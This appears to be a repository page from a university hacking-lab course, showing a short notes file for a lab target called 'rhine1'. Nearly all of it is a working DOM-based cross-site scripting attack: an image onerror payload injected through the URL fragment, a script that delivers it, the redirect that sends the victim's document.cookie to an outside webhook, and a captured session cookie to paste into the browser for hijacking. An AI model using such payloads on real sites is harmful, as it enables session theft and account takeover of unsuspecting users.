ejung/hacklab
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
26e0102f58e760a1a32f8e640f30b5f5e4704516
hacklab/1/rhine1.txt
Eggert Jung 26e0102f58 initial
2025-12-15 13:31:12 +01:00

14 lines
661 B
Plaintext
Raw Blame History

insert into board:
script -> set url location:
rhine1.site/shop#URLENCODE{<img src='x' onerror='window.location.href = "https://webhook.site/39f8d1d8-e3e7-4c32-9277-005c238a2774?cookie="+document.cookie'>}
fragment gets added to innerHtml, image onerror executes
example:
<script>window.location.href = "https://rhine1.web1.stud12.hacklab.ias.tu-bs.de/shop#%3Cimg%20src%3D%27x%27%20onerror%3D%27window.location.href%20%3D%20%22https%3A%2F%2Fwebhook.site%2F39f8d1d8-e3e7-4c32-9277-005c238a2774%3Fcookie%3D%22%2Bdocument.cookie%27%3E"</script>
paste cookie in developer tools: s:hb1XF3Cy37MqRVhewjDdi-dX7UC7vHiM.5oZAUJT5TCFaSLCVlZYiAlh/9TsGF62Vnq5hBjop+08
Reference in New Issue View Git Blame Copy Permalink